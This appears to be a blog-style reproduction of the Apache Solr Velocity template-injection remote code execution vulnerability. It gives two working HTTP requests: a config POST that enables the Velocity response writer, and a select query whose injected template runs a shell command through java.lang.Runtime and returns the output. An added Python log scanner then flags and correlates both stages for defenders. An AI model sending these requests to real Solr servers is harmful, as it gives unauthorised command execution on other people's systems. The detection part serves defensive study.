0x01 Solr overview
Solr is a fast, open-source enterprise search platform built on the popular Apache Lucene™ library.
Solr offers high reliability, scalability and fault tolerance, and provides distributed indexing, replicated querying and load balancing, automatic failover and recovery, and centralized configuration. Solr powers the search and navigation features of many of the world's largest Internet sites.
0x02 Vulnerability introduction
The vulnerability is in the Velocity module, where a template can be injected. The underlying details have not yet been made public, but a PoC has been disclosed.
0x03 Reproducing the vulnerability
Thanks to an expert for providing the environment, which saved some time.
- Open the Solr home page, click the Core Selector drop-down and pick one of the entries (I'm not familiar with Solr and don't know the proper term for this thing); we'll call it $name.
- Now construct the PoC. First, write the configuration:

```http
POST /solr/$name/config HTTP/1.1
Host: $target
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://$target/solr/
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
```
- Happily send it off; success ~
- Now write the command-execution request:

```http
GET /solr/$name/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: $target
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://$target/solr/
```
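From the defender's side, the two requests above leave a recognisable trail in a web-server or reverse-proxy access log: a write to /solr/&lt;core&gt;/config followed by a /select query with wt=velocity and a template passed inline via v.template.custom. The following is an added example (not from the original post) that flags both stages and correlates them per client and core; the log lines and the common-log-style layout matched by REQ_RE are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not from the original post), in the common
# 'client - - [time] "METHOD path HTTP/x" status bytes' layout; adapt REQ_RE to yours.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2019:10:00:01 +0000] "GET /solr/demo/select?q=1&wt=json HTTP/1.1" 200 512
10.0.0.9 - - [01/Nov/2019:10:00:02 +0000] "POST /solr/demo/config HTTP/1.1" 200 88
10.0.0.9 - - [01/Nov/2019:10:00:03 +0000] "GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3D%27%27) HTTP/1.1" 200 1024
10.0.0.7 - - [01/Nov/2019:10:00:04 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 300
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST|PUT) (\S+) HTTP/[\d.]+"')
CORE_PATH_RE = re.compile(r"^/solr/([^/]+)/(config|select)$")

def classify(line):
    """Return a finding dict for one log line, or None if it is not of interest.

    config_write    - write to /solr/<core>/config: the step that registers the
                      Velocity response writer with its params loader enabled
    velocity_render - /select with wt=velocity and an inline v.template.custom,
                      i.e. a template supplied in the URL itself
    """
    m = REQ_RE.match(line)
    if not m:
        return None
    client, method, target = m.groups()
    url = urlparse(target)
    pm = CORE_PATH_RE.match(url.path)
    if not pm:
        return None
    core, endpoint = pm.groups()
    if endpoint == "config" and method in ("POST", "PUT"):
        return {"client": client, "core": core, "stage": "config_write"}
    if endpoint == "select":
        params = parse_qs(url.query)  # percent-decodes values for us
        if params.get("wt", [""])[0].lower() == "velocity" and "v.template.custom" in params:
            return {"client": client, "core": core, "stage": "velocity_render",
                    "template": params["v.template.custom"][0][:80]}
    return None

def scan(log_text):
    """Return all findings in log order, plus (client, core) pairs seen in BOTH stages."""
    findings = [f for f in map(classify, log_text.splitlines()) if f]
    stages = {}
    for f in findings:
        stages.setdefault((f["client"], f["core"]), set()).add(f["stage"])
    chained = sorted(k for k, s in stages.items() if {"config_write", "velocity_render"} <= s)
    return findings, chained
```

A config write on its own is normal administration and a velocity writer without an inline template may be legitimate, so the chained pairs returned by scan() are the high-confidence signal; the individual findings are worth reviewing but will be noisier.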